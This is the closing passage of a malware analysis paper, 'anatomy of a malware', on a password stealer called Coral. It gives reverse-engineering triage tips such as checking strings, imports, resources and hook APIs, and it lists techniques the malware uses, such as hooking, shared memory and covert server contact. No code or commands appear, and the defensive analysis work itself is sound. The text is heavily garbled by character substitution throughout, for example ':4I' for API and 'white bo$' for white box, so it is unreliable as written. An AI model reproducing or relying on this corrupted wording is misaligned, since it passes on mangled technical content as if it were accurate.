:4I callsClearly, white bo$ analysis is a re"uirement when one wants to uncover all thesecrets of amalicious piece of codeO#onclusion

: thing one needs to ask her@himself when analy&ing a program is =3hatinformation am Ilooking for, what do I need to find now M=. :ctive reverse engineering is anefficient way to"uickly find important pieces of information. o far, we mostly did passive reverseengineering, starting from the entry point and ?ust following the code flow. Theprogram gaveus the pieces of information we needed to find, but we may have find thosefaster. In asituation where time actually matters % such as in the industry of malwareanalysis % going tothe relevant program routines at once is important.In the case of that program, the thinking could be% check the stringsJ '' it may try to steal 's credentialsJ 'py', etc confirmation of the aboveJ E9> parameters 'pass', 'user' those credentials may be sent via a E9>% check the importsJ the resource :4Is the file may be a dropper of the real malware that needsanalysisJ the shared map :4Is some vital information may be there 6which was the case7% check the dropped component


29/29

J the hook :4Is, Find3indow :4I classic combination of a hooking programJ the high%level 8TT4 handling :4Is confirms our suspicion aboveIt's only a subset of what types of fast and profitable actions we may start ananalysis with.This paper introduced some classic techni"ues used by malware authors, some

of thosebeing% storing programs into resources% sharing memory between processes the easy way% using 3indows message hooks and :4I hooks to insert spys into programs% communicating with a remote server without revealing every little piece ofinformation at afirst glance8opefully, a ne$t paper will review some of those techni"ues and present somenew ones.#eanwhile, it was a pleasure for me to talk about this Coral password stealer

programO$% & first'name d&o&t last'name a&t g&m&a&i&l d&o&t c'o'm

anatomy of a malware

Documents